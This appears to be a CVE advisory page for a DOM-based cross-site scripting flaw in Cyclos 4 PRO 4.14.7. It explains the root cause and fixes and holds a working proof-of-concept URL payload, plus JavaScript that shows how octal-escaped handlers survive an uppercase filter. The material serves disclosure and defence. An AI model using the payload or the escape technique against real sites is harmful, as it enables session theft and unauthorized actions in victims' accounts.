VYPR
Unrated severity · NVD Advisory · Published May 1, 2022 · Updated Aug 3, 2024

CVE-2021-31674

Description

Cyclos 4 PRO 4.14.7 and before does not validate user input in an error message, which allows a remote unauthenticated attacker to execute JavaScript code via an undefined enum constant.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Cyclos 4 PRO 4.14.7 and earlier does not sanitize user input in an error page, allowing DOM-based XSS via an undefined enum constant.

Vulnerability

Cyclos 4 PRO version 4.14.7 and earlier fails to validate user-supplied input when displaying an error message for an undefined enum constant. The unsanitized value is passed through a function that uppercases it before it is inserted into the page, but uppercasing is not a defence. HTML tag and attribute names are case-insensitive, so `<img src=x onerror=...>` still works as `<IMG SRC=X ONERROR=...>`, and the case-sensitive JavaScript inside the handler can be written entirely as octal escape sequences inside string literals (`\141\154\145\162\164` for `alert`), which consist only of backslashes and digits and are therefore unchanged by the transformation; the browser decodes them back to letters when it parses the handler. The original report describes this encoding as JSFuck. The result is DOM-based cross-site scripting, reachable via the public registration page or any other route that triggers the error for an invalid enum value.

Exploitation

An unauthenticated attacker sends a victim a crafted URL such as `[IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22...%22%3E`, where the body of the event handler is JavaScript written with octal escape sequences. The payload sits in the URL fragment, so it never leaves the browser and does not appear in server logs. The victim only has to open the link; no authentication and no further interaction are required. The payload survives the uppercase transformation because the HTML parts are case-insensitive and the escaped JavaScript contains no letters. When the error message is inserted into the DOM, the image fails to load, the `onerror` handler fires, and the decoded code runs in the victim's session.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser session with the Cyclos application. This can lead to theft of session cookies (where they are not marked HttpOnly), exfiltration of sensitive data shown in the application, or actions performed under the victim's privileges, such as modifying account settings or performing unauthorized transactions [1][2].

Mitigation

No official patch or fixed version is disclosed in the available references; users of Cyclos 4 PRO 4.14.7 and earlier should contact the vendor for a fixed release. A web application firewall cannot mitigate this issue: the payload is carried in the URL fragment, which browsers never send to the server, so no server-side component ever sees it. Interim defences therefore have to act in the browser. A Content-Security-Policy whose `script-src` does not allow `'unsafe-inline'` blocks inline event handlers such as `onerror`, and the client-side code should stop reflecting the unrecognised value into the error message. This vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (2)

  • Cyclos/Cyclos (source: description)
  • Cyclos/Cyclos (source: llm-fuzzy)
    Range: <=4.14.7

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation in error handling for undefined enum constants allows reflected user input to execute as JavaScript."

Attack vector

An unauthenticated, remote attacker crafts a URL containing a malicious payload appended to the fragment identifier (e.g., `/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=...`). When the victim opens this URL in a browser, Cyclos attempts to resolve an undefined enum constant, triggering an error message that reflects the unsanitized fragment value. The attacker writes the JavaScript in the handler as octal escape sequences (described as JSFuck in the original report) to bypass the `uppercase()` transformation applied to the error output, causing the injected `

Affected code

The vulnerability resides in the error-handling logic for undefined enum constants in Cyclos 4 PRO 4.14.7 and prior. When a user navigates to a URL containing an invalid enum value (e.g., a non-existent registration path), the application reflects the user-supplied value into an error message without sanitization. The advisory notes that the input passes through an `uppercase()` function; the attacker bypasses this by writing the JavaScript in the handler as octal escape sequences inside string literals, which contain no letters and so are unaffected by the case change [ref_id=1].

What the fix does

No patch is included in the bundle, and the advisory does not specify a fix. The remediation implied by the description is to stop reflecting unvalidated input into error messages: reject undefined enum values with a generic message that does not echo the input, or, if the value must be shown, insert it as text (for example via `textContent`) or HTML-encode it before it reaches an HTML sink. Uppercasing the value is not an encoding step and does not prevent script execution [ref_id=1][ref_id=2].
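The reflection pattern described above beside two hardened alternatives, as an added example. This is hypothetical code written for this page, not Cyclos's own: the renderer functions, the `KNOWN_ROUTES` allowlist and the constructed `MALICIOUS` input are all assumptions, and the only thing borrowed from the advisory is the shape of the payload.

```javascript
// Added example, not Cyclos code. Function names, the allowlist and the input
// are assumptions made for illustration.

// Hypothetical set of enum constants the route accepts.
const KNOWN_ROUTES = new Set([
  "users.users.public-registration",
  "users.users.login",
]);

// Vulnerable: upper-cases the unknown value and concatenates it into markup that
// is destined for an HTML sink (innerHTML). Uppercasing is not encoding: the
// characters that make <img onerror=...> dangerous (< > " =) have no case, and
// HTML tag/attribute names are case-insensitive, so the tag stays live.
function renderErrorVulnerable(value) {
  return `<div class="error">Undefined enum constant: ${value.toUpperCase()}</div>`;
}

// Hardened, option 1: never echo the input. Validate against the allowlist and
// return a generic message for anything else.
function renderErrorGeneric(value) {
  if (KNOWN_ROUTES.has(value)) return null; // not an error at all
  return `<div class="error">Undefined enum constant</div>`;
}

// Hardened, option 2: if the value must be shown, HTML-encode it so the browser
// renders it as text. In a real page, element.textContent = value does the same.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderErrorEncoded(value) {
  return `<div class="error">Undefined enum constant: ${escapeHtml(value)}</div>`;
}

// Crude check for this demo: does the markup contain a tag carrying an on* attribute?
function containsEventHandlerTag(html) {
  return /<[a-z]+[^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed input modelled on the PoC fragment (URL-decoded). With this plain
// handler the uppercased body becomes ALERT(1) and would not run; the reporter's
// octal-escaped handler survives the case change, but the injected tag is live
// either way, which is the defect the hardened renderers remove.
const MALICIOUS = 'users.users.public-registrationxxx<img src=x onerror="alert(1)">';

console.log("vulnerable:", renderErrorVulnerable(MALICIOUS));
console.log("generic   :", renderErrorGeneric(MALICIOUS));
console.log("encoded   :", renderErrorEncoded(MALICIOUS));
```

Option 1 is the better default for an error page: an undefined enum constant carries no information the user needs to see, so there is nothing to encode. Option 2 is for the cases where the value genuinely has to be displayed; it must be applied at the sink, not as a transformation applied somewhere earlier and hoped to hold.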

Preconditions

  • input: the attacker must craft a URL with a malicious payload in the fragment identifier.
  • network: the victim must open the crafted URL in a browser that renders Cyclos 4 PRO 4.14.7 or earlier.
  • auth: no authentication is required; the attacker can be remote and unauthenticated.

Reproduction

1. Craft a URL with the following structure: `[IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E` [ref_id=1][ref_id=2]. The octal escapes in the handler decode to `[]['filter']['constructor']('return this')()['alert'](1)`.
2. Send this URL to a victim.
3. When the victim opens the URL in a browser, Cyclos attempts to resolve the undefined enum constant, reflects the unsanitized input in an error message, and the injected JavaScript executes (e.g., an alert box appears) [ref_id=1][ref_id=2].
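The octal-escape trick used in the reproduction payload, and described under Vulnerability, Exploitation and Affected code, as an added example that is not part of the advisory or of Cyclos. The only text taken from the page is the handler string from step 1 (URL-decoded); the helper functions and the `uppercaseLikeCyclos` stand-in for the application's transformation are this example's own assumptions.

```javascript
// Added example, not Cyclos code: why upper-casing the reflected value does not
// neutralise the PoC handler. Only POC_HANDLER is taken from the page (the
// URL-decoded value of the onerror attribute in reproduction step 1).
const POC_HANDLER =
  "[]['\\146\\151\\154\\164\\145\\162']" +
  "['\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162']" +
  "('\\162\\145\\164\\165\\162\\156\\40\\164\\150\\151\\163')()" +
  "['\\141\\154\\145\\162\\164'](1)";

// What the browser's JavaScript parser sees once the escapes are decoded.
const PLAIN_HANDLER = "[]['filter']['constructor']('return this')()['alert'](1)";

// Decode legacy octal escapes as a JS string literal does: a backslash followed by
// one to three octal digits (a first digit of 4-7 allows at most two digits).
function decodeOctalEscapes(s) {
  return s.replace(/\\([0-3][0-7]{0,2}|[4-7][0-7]?)/g,
    (_, oct) => String.fromCharCode(parseInt(oct, 8)));
}

// Escape every character (code point < 256) as an octal escape; this is the form
// used inside the PoC's string literals. Escaping every character avoids the
// ambiguity of a literal digit following a short escape such as \40.
function toOctalEscapes(s) {
  let out = "";
  for (const ch of s) {
    const code = ch.codePointAt(0);
    if (code > 0xff) throw new RangeError("octal escapes only cover code points below 256");
    out += "\\" + code.toString(8);
  }
  return out;
}

// Rebuild the handler from plain words. Everything containing letters goes into a
// string literal and is escaped; what remains ([ ] ( ) ' and the digit 1) has no
// case, so String.prototype.toUpperCase leaves the whole handler untouched.
// [].filter.constructor is Function, and Function('return this')() is the global
// object, so no bare identifier such as alert or Function is ever needed.
function buildHandler(method, ctor, body, sink, arg) {
  const lit = (s) => "'" + toOctalEscapes(s) + "'";
  return `[][${lit(method)}][${lit(ctor)}](${lit(body)})()[${lit(sink)}](${arg})`;
}

// Stand-in for the application's transformation, as described on this page.
function uppercaseLikeCyclos(s) {
  return s.toUpperCase();
}

// The complete reflected vector after the transformation. Tag and attribute names
// are case-insensitive in HTML, so <IMG SRC=X ONERROR="..."> is still live markup.
function reflectedVector(handler) {
  return uppercaseLikeCyclos(`<img src=x onerror="${handler}">`);
}

// Evaluate the decoded chain up to (but not including) the sink call to confirm it
// yields the global object. Uses the Function constructor; demo only.
function chainReachesGlobal(decoded) {
  const chain = decoded.slice(0, decoded.indexOf("['alert']"));
  return new Function("return " + chain)() === globalThis;
}

console.log("decoded handler :", decodeOctalEscapes(POC_HANDLER));
console.log("escaped survives:", uppercaseLikeCyclos(POC_HANDLER) === POC_HANDLER);
console.log("plain survives  :", uppercaseLikeCyclos(PLAIN_HANDLER) === PLAIN_HANDLER);
console.log("reflected vector:", reflectedVector(POC_HANDLER));
```

The takeaway for reviewers of similar code: any transformation that only changes letter case, trims, or otherwise "cleans" a value leaves every character that matters to the HTML parser intact, and an attacker who controls a string literal can rewrite the case-sensitive part without using a single letter.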

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (3)

News mentions (0)

No linked articles in our index yet.